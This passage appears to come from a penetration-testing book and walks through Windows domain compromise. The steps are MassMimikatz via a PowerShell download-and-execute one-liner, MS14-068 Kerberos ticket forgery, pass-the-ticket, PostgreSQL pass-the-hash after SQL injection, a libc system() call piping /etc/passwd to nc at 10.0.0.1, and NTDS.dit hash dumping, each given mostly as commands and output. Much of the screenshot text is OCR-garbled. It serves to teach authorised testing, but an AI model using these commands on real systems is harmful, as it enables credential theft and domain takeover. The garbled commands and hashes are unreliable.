## \ / ## Benjamin DELPY 'gentilkiwi' ( benjamin@gentiT.kiwi.coin ) 
’## v ##’ http://blog.gentilkiwi.com/mimikatz (oe.eo) 

*#####’_with 14 modules * ♦ */ 



Remote PowerShell Execution with WMI 


This is done all remotely in memory without any executables being run. 

So is there a better way to do all this? Harmjoy created a MassMimikatz tool that, for the most part, 
does the same thing. {19} Let’s take a look at this. 


MassMimikatz will first start up a web server for the Mimikatz code. This is why we are going to set 
a FireWallRule in the switch statement. Next, the script will use WMI to execute PowerShell scripts 
on the hosts using the cached credentials on each system, and store the results in a folder called 
MimikatzOutput. Let’s see this in action against a few win7 and win8 systems. 

• Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo 
MassMimikatz.ps L); '"win7Vwin8' | Invoke-MassMimikatz-Verbose -FireWallRule" 


T:\HSndnw^V'.y'.tpn52S-pDMcr'ihc’ 1X.ftaP Han! -fjcrc Etyp.iw If)! (New-Object N?t.kebClUnt}.DowilD|d£trlnt('httpi:j 

trTflali/fldster/PeMPeuPnr/InvQkc-ffeB^llilkitz.psl 1 ) \ r ’kin7’, 
VERBOSE: Srttjnf; inhaunrl flrrklll ruk fan pant SOSO 
VERBOSE; Sleeping, letting the keb server stand up... 
VERBOSE: Executing cowind on host win? 

VERBOSE; Executing oHHiand on host Mina 

VERBOSE: Halting 36 seconds for contends to trigger... 
VERBOSE: Piling output frnn ffllder "MUikatiOutput’ 

kina’ ] invoke-JtassNlidkatz -Verbose ■FireWallRule" 

Server 

Credential 

win? 

t estui erl/MJCkEK: ^ MS? HI 7ft3d9 ISfiiflMSadtfebbe 

kin? 

testuserl/KKKEH: 1 ftsdfasdfasdf 11 

ufn? 

testusirl/fiACkER: SAtdfisdfaidfl! 

kin? 

testuser WKER, TESTiM: lAsdfasdfasdtl! 

wing 

liWHACKER:efliJdlcHI79Hd«56fe9IIWe5it*t 

wins 

lab/l IACKER:3 Asdfdsdfasdf1! 

king 

lib/HUKERs IMfasdfasdfll 

klnfi 

VERBOSE: Removing inbound firewall rule 

VERBOSE: killing the Heb server 

ldb/UACKER.TESTtAB:SftbdfdSdfdidf1J 


MassMimikatz 


We don’t need to worry about password cracking at all, as we will use the speed and efficiency of 
MassMimikatz to pull clear text passwords. 


Kerberos - MS14-068: 


Kerberos had a lot of large vulnerabilities in the past couple of years. One of the biggest 





vulnerabilities was MS 14-068. This gave any domain user the ability to privilege escalate to domain 
administrator. If you don’t have a great understanding of Kerberos yet, this would be a great time to 
get a refresher. If you do have a good understanding of Kerberos, keep moving forward. 


As we know, Kerberos is used for authentication and authorization. The underlying issue is that the 
Privilege Attribute Certificate (PAC), which stores information such as account name, ID, and group 
membership information, can be forged. This means that, with some basic information on a domain 
user, you have the ability to move to domain administrator. 

• git clone https://github.com/bidord/pykek/opt/pykek/ 

• apt-get install krb5-user 

• apt-get install rdate 

• rdate -n [Domain] 

• echo 172.16.151.200 dc.hacker.testlab »/etc/hosts 

We are going to need to know four pieces of information: 

• -u username@domain [example: limiteduser@hacker.testlab 

• -d domain controller [example: dc.hacker.testlab 

• -p password 

• -s SID [example: S-1-5-21-3525058729-1821581466-2040179600-1111] 

We should have all the information except for the SID. To get the sid, just run this command on any 
limited user account: 

• whoami /user 


C:\Users\liniteduser>whoani /user 
USER INFORMATION 

User Nane SID 

hacker\liniteduser S-1-5-21-3525058729-1821S81466-2040179600-1111 


Retrieving SID information with Whoami 


Now that we have all the pieces we need: 

• cd /opt/pykek/ 

• python ms 14-068.py-d dc.hacker.testlab -u lirmteduser@hacker.testlab -s S-l-5-21- 
3525058729-1821581466-2040179600-1111 -p ' !Asdfasdfasdfl!' 







root@kali: /opt/pykek 

File Edit View Search Terminal Help 


:/opt/pykek# python msl4-068.py -d dc .hacker.testTab -u limiteduser@hack 
r.testlab -s S-1-5-21-3525058729-1821581466-2040179600-11U -p\* lAsdfasdfasdfl!' 
(♦) Building AS-REQ for dc.hacker.testlab... Done! \ 

[♦] Sending AS-REQ to dc.hacker.testlab... Done! V 

[+] Receiving AS-REP from dc.hacker.testlab... Done! 

[+] Parsing AS-REP from dc .hacker.testlab... Done! ^ 

[♦] Building TGS-REQ for dc.hacker.testlab... Done! 

[+] Sending TGS-REQ to dc.hacker.testlab... Done! 

[+] Receiving TGS-REP from dc.hacker.testlab... Done! 

[♦] Parsing TGS-REP from dc.hacker.testlab... Done! 

[♦] Creating ccache file , TGT_limiteduser<Jhacker.testlab.ccache'... Done! 
i:/opt/pykek# | 


Creating the ccache Kerberos File 


We have a credential cache ticket generated and to use it we copy it to tmp/krb5cc_0: 

• cp TGT_limiteduser@hacker. testlab. ccache /tmp/krb5cc_0 
You can now access the host using: 

• smbclient-k-W hacker.testlab //dc.hacker.testlab/c$ -k 


The other option is to push the credential cache ticket and the mimikatz executable to the victim host 
and run: 

• mimikatz.exe "kerberos::ptc TGT_limiteduser@hacker.testlab.ccache" exit 


You are able to do a dir \\dc\c$ and have full access to the victim host. 


More info: 

• https: //github. com/bidord/ pvkek 

• https ://communi ty.rapid7.com/ community/ metasploit/blog/2014/12/25/12-davs-of- 

haxmas-msl 4-068-now-in-metasploit 

• https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-msl4-068- 
exploitation-and-defence/ 


Pass-The-Ticket 


We should all be pretty familiar with Pass-the-Hash attacks from the previous book and this book as 
well. With all the Kerberos attacks, it is possible to pass Kerberos tickets as well. Let’s walkthrough 
an example of stealing Kerberos authentication tickets to impersonate users throughout the network. 
{ 20 } 

















m3 mimikatz 2.0 alpha x64 (oe.eo) 


C: \mimikatz_trunk\x6*»>dir \\dc\c$ 

Access is denied. 

C:\mimikatz_trunk\x64>mimikatz exe 

MBMMM mimikatz 2.6 alpha (x6M) release "Kiwi en C" (Jan 22 2615 22:16:69) 

.MM * MB. 

MB / \ MM /x m m 

MM \ / MB Benjamin DELPV gentilkiwi’ ( benjamin@gentilkiui.com ) 

'MM v MB' http://blog.gentilkiui.com/mimikatz (oe.eo) 

MMMBM' uith 15 modules x x x/ 


mimikatz M privilege::debug 
Priuilege '26' OK 

mimikatz M sekurlsa::tickets /export 

Authentication Id : 6 ; 367551 (60000000:OOOMbl5f) 

Session : Interactive from 1 

User Name : testuserl 

Domain : HACKER 

SID : S-1 -5-21 -3525058729-1821581 M66-2e<4ei 79600-1106 


Kerberos Tickets 




• privilege :: debug 

• sekurlsa: tickets /export 


The export command will write all of the Kerberos tickets to the folder from which it was executed. 
In the example below, we see the user account “lab” that we recovered. We know from the start that 
“lab” was a domain administrative account. 




to mimikatz 20a|pha nM[«.eoJ 


Group D - Ticket Granting Stfuiti 

| MMNM] 

Stert/fn^siRen^r 2/8/2815 1& 32 37 PH ; J/J/2815 S:H:28 AH j 2/15/2815 10;32;2S PH 
brviH NilI [021 : ldap ; tft.huklf tut lib : 0 HACKER.TESTLBB 

Tirglt Nan (82) ; Wap : ft hiehlr.tMtllb : G HACKER TESTlfii 

tlimb Nail (81) i lab , fl HflCtER.TESTLflB 

Flftgf 40iffl800 t nan fcinofiicaliii ; ok„H a diUgah : pr#,fcrthint : rvnmbli : forwdibli ; 
Seisin Key j OxOQfflQQI2 - fl«25S.hnac 

HBa fbZtfi T5dc3eddc?258smi oisuos Jdo iwaiorf MflfdBZ rrn i ^ n 1453 
Ticktt i Mneevu - i*t2tt.jwo ;iwmm 

«fruid to fill [e:db5bf(-Q-6-^l0d59€DQ-lab4ldap-dc.h«-ck*r.t«atUb.kirbi f 
[80080001] 

Stifl/Crtd/HtaRMWi* 2/B/2D15 tQ.32.3G PH ; 2/3/2015 3.32.1-S AH ; 2/15/2015 1 Di32.2« PN 
SfrviM Nan (02) : LOflR : K.hacktr.testlab : hackir.tistl* : 8 HACKER.TESTL4B 

Target Wmt (02) t LOflP • CC httktf test lab | hacker, tlitlab • 0 HACKER. IE5-TLAB 

CLitnb Nan (01) : lab : a HACKEA.TE5TLAB [ HOCKER TESTLftB ) 

Fl8)l 40flWO ; MttjJtfojdCllill ; flk_iS_ftli)jto i pr#_IUKh*f>t : rofWMbW : fgrwSrftbW ; 
Stssion Ktg : 9 x 00900912 " aisZ 06 hliiC 

fieklfc s CkOGSOOCM 2 - atl25ljiut ; \m i 4 [...] 

«5av*d to fill [0:it?0bfl B 0*1 ,1 l0a50000 B l8biLDftP , DC.hfldfr.t*t;tkt}.kirbi ! 

[ODOODQQ2] 

Stoi/End/HKfttnw: 2/8/201& 10:52:29 Pfl ; 2/3/2019 8:52:28 AH , 2/15/2815 10:52:28 PH 
StfVlM Naas (02) ■ HOST : SC.HttkH^titlib ; a HACKER. TE5TLAB 
Target Nan (02) : HOST ; tt.hwkir.tntlab : 8 HACKER.TE$TLA8 
Client NHI (81) i lib ; 0 HACKER JE5TWB 

Flag: 4 Da 50009 . ftBH.taunkBLizi ; ak.ai.dilfgabt ; prraufctoflt ; rih^abli ; farwardabli ; 

Snsiofl Kty ; 8*0090081 £ - ii& 25 &_haat 
f Wf 332 T40i4fl|«3f Ti?S f f 2 31 bfi 2932 t £44 4 GOf 5 bb 2 f G 31 f ft 3 ad 5 £ Tt 5 * 2 b 2 
TicXifc : 0 x 00800012 ■ ifilUjHt ■ rnino ? 4 [.,.] 

- Sftktf to fill [0:afr3bf]-Q-2-4Ofl5C30Q-lflb5HQSr-D; hacker.tisthb kirbi ! 


Kerberos Tickets 


If we look in the same folder, we see a Kerberos krbtgt ticket for the user account lab. We need to 
import that as one of our Kerberos tickets. Then, drop back into Mimikatz: 

• kerberos::ptt [0:ab9bf] -2-l-40el0000-lab@,krbtgt-HACKER.TESTLAB.kirbi 






er 

>en 


Cd60868dee3c9fd1d99dcdab591 b3aae8927355aa9daa35aa32dc10sfe91 ae5f 
Ticket : 6x09960012 - aes256_h*ac ; kvno =2 (•■■) 

i Saved to file [0;3e7J-2-1-90e10000-UIN7$8krbtgt-HOCKER.TESTLOB.kirbi ! 

■ iaikatz It kerberos: :ptt [6 ab9bf ]*2*1-96e16000-lab8krbtgt-H0CKER TESTLOB.kirbi 
6 - File '[8:ab9bf)-2-1-96e16000-labSkrbtgt-HOCKER.TESTLOB.kirbi' : OK 

aiaikatz It exit 
Byet 

C:\aiaikatz_trunk\x69>dir \\dc\c$ 

Uoluae in drive \\dc\c$ has no label. 

Uoluae Serial Nuaber is 90F8-1BB9 


Directory of \\dc\e$ 


08/22/2013 

67:52 

OH 

<0IR> 

PerfLogs 

12/28/2019 

02:28 

PM 

<0IR> 

Prograa Files 

08/22/2013 

07:39 

OH 

<0IR> 

Prograa Filas (x86) 

01/19/2015 

69:35 

PM 

<0IR> 

Share 

02/09/2015 

11:29 

PH 

<D1R> 

Users 

O1/O5/2015 

61 02 

OH 

<DIR> 

Windows 


0 File(s) 0 bytes 

6 Oir(s) 21.MOM.258.309 bytes free 


[C:\aiaikatz_trunk\x6 l l>i 


WMMTJUMMlWVJWI-TMlWflWflK-WIWWfWWffl Iflffll- 

[0;4bll4]-0-l-40a50000-testuserl<e>ldap-dc.hacker.tesHab.kwbi 

[0;4bll4]-0-2-40a50000-testuserl<§>LDAP-DC.hacker.testlab.kirbi 

[0;4bll4]-2-0-60alOOOO-testuserl@kjbtgt-HACKER.TESTLAB.ki(bi 

[0:4bll4]-2-l-40elOOOOtestusefl@krbtgt-KACKER.TESTLAB.kirbi 

[0;ab9bf]-O-O-4OaS0OOO-lab@ldap-dchackef.testlab.kirbi 

(0;ab9bf]-O-l-40aS0O00-lab@lDAP-DC.hacker.testlab.kirbi 


!aab9bf]-0-2-40a50000lab@HOSTDC.hackef.tesHab.kirbi 
(0;ab9bf] O-3-40aSOOO0 lab@cifs dc.hacket.testlab.kirbi 
[0;ab9bf]-2O-60alOOOOIab@kibtgt-HACKER.TESTlAB.kirbi 
[0;ab9bf]-2-l-40el0(XX)-lab@kibtgtHACKER.TESTLAB.kirbi 

A rn a aaaa at a r»l I • * a • a n/rn rrm an a a a r«rA t r r ti a n 

Kerberos - Pass-the-Ticket 


Once we drop out of Mimikatz, we can do a directory listing on the domain controller and get a 
listing. We now have a Kerberos ticket as a domain administrative account. 


Lateral Movement With Postgres SQL 


I love lateral movement as it takes creativity and an understanding of how exactly technologies work. 
On versions of PostgreSQL v9.5 and earlier (remember that most orgs that I found do not regularly 
patch PostgreSQL), lies a vulnerability that allows a pass-the-hash authentication. This was 
originally found by Jens Steube and Phillipp Schmidt and allows an attacker to authenticate to 
PostgreSQL databases that utilize ChallengeResponse Authentication using the ALTTH REQ MD5 
method or simply configuring "md5" as the Host Based Authentication (HBA) in pg hba.conf. (21} 


Here is their amazing paper on how they discovered that during the authentication process, the actual 
password is not checked, but instead has the hash: 

https://hashcat.net/misc/postgres-pth/postgres-pth.pdf . 

Let’s say you are on an internal penetration test, and you used SQLMap or a similar tool to identify an 
SQL injection on a web page that utilizes a postgreSQL backend. It might look something like: 

• http://postgres.suck.testlab/search.php?search=weapons'union 


select 









null,concat(usename,passwd) FROM pg shadow— 

• http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet 


The result will be a list of hashes of all the users: 

• postgres,md532el2f215ba27cb750c9e093ce4b5127 

• Secretlogimnd598d21549d6420160b54f7898a7ff60cc 

• john,md5cbfafle32c71 Iee7ba63b5b65f8a777b 

• test,md505a671 c66aefea 124cc08b76ea6d30bb 

We could spend time dropping it in oclhashcat and trying to crack the passwords, but due to the PTH 
issues, we can actually connect to all the other postgresql servers with just the hash. Let’s walk 
through how this is done. We are going to pull a copy of postgresql onto our box, download the patch, 
apply the patch, and configure and install our modified version of psql. Psql is just an interactive 
terminal to connect to postgres. With our modified version, we can now supply hashes instead of 
passwords. 

I tested this with Postgres Commit: a2e35b53c39b2a27d3e332dc7c506539c306fd44 

• mkdir /opt/postgresql/ && wget 

https://github.com/postgres/postgres/archive/a2e35b53c39b2a27d3e332dc7c506539c: 
&& unzip a2e35b53c39b2a27d3e332dc7c506539c306fd44.zip -d /opt/ && mv 
/Opt/postgres-a2e35b53c39b2a27d3e332dc7c506539c306fd44 /opt/postgresql/ && 
cd /opt/postgresql/ 

• wget https://hashcat.net/misc/postgres-pth/postgresql_diff_clean.txt 

• git apply postgresql_diff_clean.txt 

• ./configure 

• make && make install 

• cd /usr/local/pgsql/bin/ 

• ./psql -h [IP of PostgreSQL server] -U postgres 

• Supply hash of the postgres user 

But why stop there? To show you what you can do once you are logged in as the privileged Postgres 
user, we will read the /etc/passwd file. 

• CREATE TABLE mydata(t text); 

• COPY mydata FROM '/etc/passwd'; 

• SELECT t FROM mydata LIMIT 5 OFFSET 1; 



root@kali: /usr/local/pgsql/bin 

File Edit View Search Terminal Help 


)ot@kili:/usr/local/pgsql./b±n# ./psql -h 192.168.199.132 -U postgres 
Hash for user postgres: md532el2f215ba27cb750c9e093ce4b5127 
psql (9.5devel, server 9.1.13) 

Type "help" for help. 

postgres=# CREATE TABLE mydata(t text); 

CREATE TABLE 

postgres=# COPY mydata FROM '/etc/passwd’; 

COPY 44 

ppstgres=# SELECT t FROM mydata LIMIT 5 OFFSET 1; 

I.X....*. 

daemon:x:1:1 :daemon:/us r/sbin : /bin/sh 
bin: x :2:2:bin:/bin:/bin/sh 
sys:x:3:3:sys: /dgv :/bin/sh 
sync: x :4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/us r/games:/bin/sh 
(5 rows) 

postgres=# | 


Pass-the-Hash with PostgreSQL 


We can also run command shells to fully compromise the host. 

• CREATE OR REPLACE FUNCTION system(c string) RETURNS int AS 

'/lib/libc.so.6', 'system' LANGUAGE ’C' STRICT; — privSELECT system('cat 

/etc/passwd | nc 10.0.0.1 8080'); 

• http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet 
If you want to run this exercise in a controlled environment, the version installed on Kali Linux 
(before any updates) should be vulnerable as long as it is older than v9.5. If it is not, you will have to 
uninstall PostgreSQL before installing the vulnerable version. Once installed, create a new user (in 
this case “thp”), create a database, and print out the hash: 

• sudo -u postgres psql 

• create user thp createdb createuser password 'thp'; 

• create database thp owner thp; 

• select (usename,passwd) FROM pg shadow; 

• Grab the created hash password for the “thp” user 

• Run the example above, but instead of the user “postgres” use “thp” 


Pulling Cached Credentials 


Did you ever try to log onto your laptop while you weren’t on the network? How can you authenticate 
without being connected to the domain? It is because Windows stores the last ten users with 
successful logins by default. If we can dump this, this is another way to find additional credentials. 
We won’t be able to pull these passwords in clear text, so we will have to try to crack these 
credentials. 


What types of users might you see? Of course the user of the laptop, but you will usually also find an 
account like “helpdesk” or similar, as they originally set up the machine. In the next example, we will 
assume you already have a Meterpreter shell on our victim host and we will use Metasploit’s 
cachedump module to pull these creds. 






Within Metasploit. we will can use cachedump (with Local Admin privileges): 

• use post/windows/gather/cachedump 

• set SESSIONS 1 

• show options 

• exploit 

[*] Executing module against win7 

[*] Cached Credentials Setting: - (Max is 50 and 0 disables, and 10 is default) 

[*] Obtaining boot key... 

[*] Obtaining Lsa key... 

[*] Vista or above system 
[*] Obtaining LK$KM... 

[*] Dumping cached credentials... 

[*] Hash are in MSCACHEVISTA format. (mscash2) 

[*] MSCACHE v2 saved in: 

/root/.msf4/loot/20150128134030_default_192.168.199.1_mscache2.creds_209900.txt 
[*] John the Ripper format: 

# mscash2 

domainadmin: $hacker$#domain_admin#06198c06198c06198c06198c06198c9 :HACKER.TESTLAI 


To Crack in oclHashCat: 

If it is in a file, the proper format is: 

$DCC2$ 10240#account_name#hash 

Although using faster GPUs helps, the major problem with cached credentials is that it is very very 
slow to crack. Attacking cached credentials is usually an approach that you might take if you can’t 
move laterally or need to crack in the background while you continue to attack. Let’s look at the 
oclHashcat command: 

• oclHashcat64.exe -m2100 hashes\mscash2.txtlists\crackstat_realhuman_phill.txt 



Session.Name...: oclHashcat 
Status.: Running 

Rules.Type.: File (rulesMnsidePro-HashHanager.ntle) 

Input.Mode.: File <lists\crackstat_i*ealhuman_phill.txt> 

Hash.Target....: $DCC2$10240BtestlB607bbe89611e37446e736f?856515bf8 

Hash.Type.: DCC2, nscash2 

Time.Started...: Thu Jan 29 21:04:21 2015 <1 sec) 

Time.Estimated.: Tue Feb 17 05:18:41 2015 <18 days, 8 hours) 

Speed.GPU.#1...: 135.1 kH/s 

Speed.GPU.#2...: 140.9 kH/s 

Speed.GPU.«»...: 276.0 kH/s 

Recouered.: 0/1 <0.00x> Digests, 0/1 <0.00z> Salts 

Progress.: 405504/410478832235 <0.00x> 

Skipped.: 0/405504 <0.00x) 

Rejected.: 0/405504 <0.00x) 

HUMon.GPU,R1...: 99x Util, 45c Tenp, N/A Fan 
HUMon.GPU.lt2...: 100X Util, 49c Temp, N/A Fan 


Session.Name...: oclHashcat 
Status.: Aborted 

Rules.Type.: File <rules\InsidePro-HashManager.rule) 

Input.Mode.: File <lists\crackstat_realhuman_phill.txt) 

Hash.Target....: $DCC2$10240BtestlB607bbe89611e37446e?36f?856515bf8 

Hash.Type.: DCC2, nscash2 

lime.Started...: Thu Jan 29 21:04:21 2015 <3 secs) 

Time.Estimated.: Thu Feb 19 08:32:47 2015 <20 days, 11 hours) 

Speed.GPU.#1...: 135.0 kH/s 

Speed.GPU.»2...: 140.9 kH/s 

Speed.GPU.H*...: 275.9 kH/s 

Recouered.: 0/1 <0.00x> Digests, 0/1 <0.00x> Salts 

Progress.: 698368/410478832235 <0.00x> 

Skipped.: 0/698368 <0.00z) 

Rejected.: 0/698368 <0.00x) 

HUMon.GPU.Bl...: 20/ Util, 46c Tenp, N/A Fan 
HUMon.GPU.B2...: 0/ Util, 46c Tenp, N/A Fan 


Started: Thu Jan 29 21:04:21 2015 
Stopped: Thu Jan 29 21:04:25 2015 

C:\Users\chcetz\DownloadsNocltkishcat-l .32 )oc lHAshcat64.exe — n 2100 )iAshcs\nscAS 


oclHashcat - mscash2 


We can decide to add a rule to cracking our mscash2 hash with the command: 

• oclHashcat64.exe -m2100 hashes\mscash2.txt lists\crackstat_realhuman_phill.txt -r 
rules\InsidePro-HashManager.rule —force 


We are now looking at about 20 days to crack this hash. Although mscash2 hashes are extremely 
valuable, the amount of time it takes to crack might not be feasible on a one-week penetration test. 
This could be used for more long-term attacks. 


Attacking The Domain Controller: 


If you were lucky enough to get a local administrative account or a domain admin account, the next 
target is usually the Domain Controller (DC). One of the happiest moments for any pentester is when 
they successfully pull all the hashes out of the DC. 


Even with administrative credentials, we don't have access to read the hashes on the Domain 
Controller that are stored in the c:\Windows\NTDS\ntds.dit file. This is because that file is read- 
locked as Active Directory constantly accesses it. The solution to this problem is to use the Shadow 
Copy functionality natively in Windows to create a copy of that file. {22} 




















SMBExec 

(https://github.com/bravOhax/smbexec) (Kali Linux) 


This is where a tool called SMBExec comes into play. SMBExec, a tool made by bravOhax, grabs the 
SYS reg keys and ntds.dit file using the Shadow Copy functionality. Let's take a look at the SMBExec 
module that we installed in the Setting Up Your Box section. 

• Running SMBExec 

o cd /opt/smbexec 
o ./smbexec 

• Select 3 for Obtain Hashes 

• Select 2 for Domain Controllers 

• Provide username/hash/domain/IP/NTDS Drive/NTDS Path 


Please provide the usernarie to authenticate as: adnin_dccoint 

Please provide the password or hash (<IM>;<NTLK>) [BLANK): lAdnlnlAccoirt! 

Please provide the Domain for the user account specified (localhost): corp.fakedomaln.testlab 
Domain Controller IP address: 172.16.139.1% 

Enter NTDS Drive [C:]: 

Enter NTDS Path (\Wlndows\NTD$): 

|*| Checking to see If the ntds.dit file exists in the provided path 
M The ntds.dit file was found in the path provided... 

Enter the Drive to save the Shadow Copy and SYS key [C:): 

Enter the Path to save the Shadow Copy and SYS key [\Windows\TEMP): 

1*1 Checking to see If the provided path exists 
id The path provided exists... 

1*1 we have to make sure there is enough disk space available before we do the Shadow Copy 
id Plenty of diskspace... 

1*1 Attempting to create a Volume Shadow Copy for the Domain Controller specified... 
j+j Volume Shadow Copy Successfully Created... 

|*| Attempting to copy the ntds.dit file from the Volume Shadow Copy... 

!♦ 

!♦ 


1*1 Extracting data and link tables from the ntds.dit file... 
esedbexport 20120102 

Opening file. 

Exporting table 1 (NSysOb)ects) out of 12. 

Exporting table 2 (NSysOb)ectsShadow) out of 12. 

Exporting table 3 (N$y$UnlcodeFl>upver2) out of 12. 

Exporting table 4 (datat able) out of 12._ 


SMBExec - Volume Shadow Copy 


NTDS.dlt download complete 

We have ntds.dit S sys files...let's get some hashes 

Attempting to remove the files created from the Domain Controller... 1 

mnj 

Attempting to remove the shadow copy created from the Domain Controller. 


We just saw that SMBExec connected to the Domain Controller with valid credentials, validated 
paths, and attempted to create a Shadow Copy of the ntds.dit and sys files. Once this was completed, 
SMBExec tried to parse through those files and collect and store all the password hashes from LDAP. 





Once SMBExec finishes and is successful, it creates a folder in the same directory based on a date¬ 
time stamp. If you go into this folder you will see a file called [domain]-dc-hashes.1st. 


:/0pt/]lE>£XC£f U 

2513-12-Ll-22S0-nbiKac install , sh patches progs README snbexec.sh sc 

cd $13-II-11-2BM ■«&««/ 

:/opt/JlbilltC/2013 12-lidir 

hashes 

fa Dt9i.il l;/*pV Jibe*t£/2til3 ■ 12-II ■ 2300-Slbtit£ /hi ShSSfl 15 
K 

:/wt/5nbwcc/2013-12-li-2300-j«b«wc/hish?j» id D II 

roetgitsi Is 

corp.fafcedaBaln.testlab-dc-hashes. 1st cred. 1st ntds.dit ntd?.output sys 

:/cpt/s«bei(ec/2{ii3-12-ll-2300-s«b(i4c/hish!s/DC# vi Cfi rp. f akedon ain. test lab-dc-hashes ,lsT 


SMBExec Results 


Inside the example compromised domain controller, I am able to find the NTLM hashes for the 
following users: 


Administrator: 500: 

aad3b435b51404eeaad3b435b51404ee: 8b9e471 f83d355eda6bf63524b044870::: 

Guest: 501: aad3b435b51404eeaad3b435b51404ee:3Id6cfe0dl6ae93Ib73c59d7e0c089c0::: 
adminaccount: 1000: 

aad3b435b51404eeaad3b435b51404ee:954bf28f34e47904f5c8725650f27283:: 

krbtgt: 502: aad3b435b51404eeaad3b435b51404ee:876c4efd01dbf8da6cd04c60ddac0f95::: 

bobsmith: 1105: aad3b435b51404eeaad3b435b51404ee:8faf590241 a5d5ed59fb80eb00440589::: 

domainadmin: 1106: 

aad3b435b51404eeaad3b435b51404ee: 8faf59024 Ia5d5ed59fb80eb00440589::: 

pmartian: 1107: aad3b435b51404eeaad3b435b51404ee:8faf590241a5d5ed59fb80eb00440589::: 


Remember that if you are querying a large domain controller, go grab a coffee, as this will take a 
considerable amount of time. After you collect all these hashes, you can start password cracking or 
utilize the passing of hashes to continually exploit boxes. 


PSExecNTDSgrab 

t http://www,rapid7.com/db/modules/auxiliary/admin/smb/pscxcc ntdsgrab l (Kali Linux): 


Another great way to dump hashes is with a metasploit module called psexec ntdsgrab. Similar to 
SMBExec, PSExec NTDSGrab “authenticates to an Active Directory Domain Controller and creates 
a volume shadow copy of the %SYSTEMDRTVE%. It then pulls down copies of the ntds.dit file as 
well as the SYSTEM hive and stores them The ntds.dit and SYSTEM hive copy can be used in 
combination with other tools for offline extraction of AD password hashes. All of this is done without 
uploading a single binary to the target host.” {23} 





With local/domain administrator credentials, let’s grab the domain hashes: 

• msfconsole 

• use auxiliary/admhTsmb/psexecntdsgrab 

• Make sure to SET the fields for RHOST, SMBDomain, SMBPass, and SMBUser 

• exploit 


Tif auxillaryl ■ I > show options 

Module options (euxlllary/ad«ln/sab/p*exec_ntd*grab^ 


Naae 

Current Setting 

Required Description 

CREATE NEW VSC 

false 

no 

If true, attempts to create a voluae shadow t 

RHOST 

172.16.151.299 

yes 

The target address 

RPORT 

445 

yes 

Set the SMB service port 

SERVICE DESCRIPTION 


no 

Servico deicrlption to lo be us«Von target 

SERVICE DISPlAY SAME 


no 

The service dlsolav naaa \ 

SERVICE NAME 


no 

The service name V 

SNBDonain 

hacker.testlab 

no 

The Winders domain to use tc wthentlcatlcn 

SMBPass 

'AsdfasdfasdfC 

no 

The password for the specified usefrim|A 

SMBSHARE 

CJ 

yes 

The nane of a wrlteable share on the server 

SNBUser 

lab 

no 

The username to authenticate as 

VSCPATH 


no 

The path to the target Volune Shadow Cop^^ 

WINPATH 

Hi! auxlllaryl: 

WINDOWS 

) » exploit 

yes 

The nane of the Windows directory (eianples: 


for pretty listing 


WINOunS. WINNT) 


IM 172.16.1S1 
1*1 172.16.151 
I 172.16.151 
1*1 172.16.151 
M 172.16.151 
(♦) 172.16.151 
M 172.16.151 
1*1 172.16.151 
|*| 172.16.151 
M 172.16.151 
|*| 172.16.151 
M 172.16.151 


260:445 
260:445 
260:445 
299:445 
; :44! 
299:445 
M1:44! 
299:445 
299:445 
299:445 
299:445 
299:445 


Chocking If a Volune Shadow Copy exists already. 

Service start tiaed out, OK If running a coiwand or non-service executable.. 
No VSC Found. ^_ 


Creating Volune Shadow Copy 



Downloading ntds.dit _ 
ntds.dit stored at / i ro»t/.»sf4/looyil91^14ie(125fl r d»ffyl^)!72.tl6.l5.l.299_(>lexec.ntdlj)rab 


Cl 172.16.151 
H 172.16.151 
.bln 

Cl 172.16.151 
Cl 172.16.151 
Cl Auxiliary 
I msf auxiliary! 


299:445 - Downloading SYSTEM hive file 

299:445 - SYSTEM hive stored at /root/.asf4Aoot/29159214180253_default.l72.16.151.299_p»xec.ntdsg 


.299:445 

. - 44 - 


Executing cleanup... 
Cleanup was successful 
nodule execution coapleted 

) > show actions 


Using psexec ntdsgrab 


If grabbing the NTDS.dit file was successful, Metasploit will drop the file to the /root/.ms4/loot/ 
folder. Next, we will need to convert the dit file to hashes with esedbtool and NTDSextract. 


esedbexport command: 

• How to run: esedbexport -t [Location of Export] [NTDS.dit file] 

• /opt/esedbtools/esedbexport -t /tmp/ntds 

/root/.msf4/loot/20150214180250_default_l 72.16.151.200_psexec.ntdsgrab._641158. 






:/opt# /opt/esedbtools/esedbexport -t /tmp/ntds /root/.msf4/lo 
ot/20150214180250_default_172.16.151.200_psexec.ntdsgrab._641158.dit 
esedbexport 20120102 


Opening file. 
Exporting table 1 
Exporting table 2 
Exporting table 
Exporting table 
Exporting table 
Exporting table 
Exporting table 
Exporting table 8 
Exporting table 9 
Exporting table 10 
Exporting table 11 
Exporting table 12 
Exporting table 13 
Exporting table 14 
Export completed. 



(MSysObji 
(MSysObjl 
(MSysObj[ 

(MSysLoc« 

(datatablaivOut^ajEjlAvj- hpromp 
(hiddentabtdrouvWW. 
(link_history_table) out of 14. 
(link_table) out of 14. 

(sdpropcounttable) out of 14. 

(sdproptable) out of 14. 

(sd_table) out of 14. 

(MSysDefrag2) out of 14. 

(quota_table) out of 14. 
(quota_rebuild_progress_table) out of 14. 


Converting NTDS.dit 


Next we need to run dshashes.py to convert our tables to password hashes. How to run: 

• dshashes.py [datatable table] [link table] —passwordhashes [original bin file from 
ntdsgrab] 

• python /opt/NTDSXtract/dshashes.py /tmp/ntds.export/datatable.4 

/tmp/ntds. export/linktable. 7 /tmp/ —passwordhashes 

/root/.msf4/loot/20150214180253_default_172.16.151.200_psexec.ntdsgrab._127578. 


i i:/opt# python /opt/NTDSXtract/dshashes.py /tmp/ntds.export/datatable.4 /tmp/nt 
ds.export/Unk_table.7 /tmp/ --passwordhashes /root/.iwf4/loot/2015021418O253_default_l 
72.16.151.20O_psexec.ntdsgrab._127578.bin 
Running with options: 

Extracting password hashes 

Initialising engine... r, \ 

Scanning database - 100% -> 3824 records processed 
Extracting schema information - 100% -> 1738 records processed. 

'Extracting object links... 

List 

'Administrator:500:aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356e09480de5ebbe::: 
lab:1001:aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356e09480de5ebbe::: 
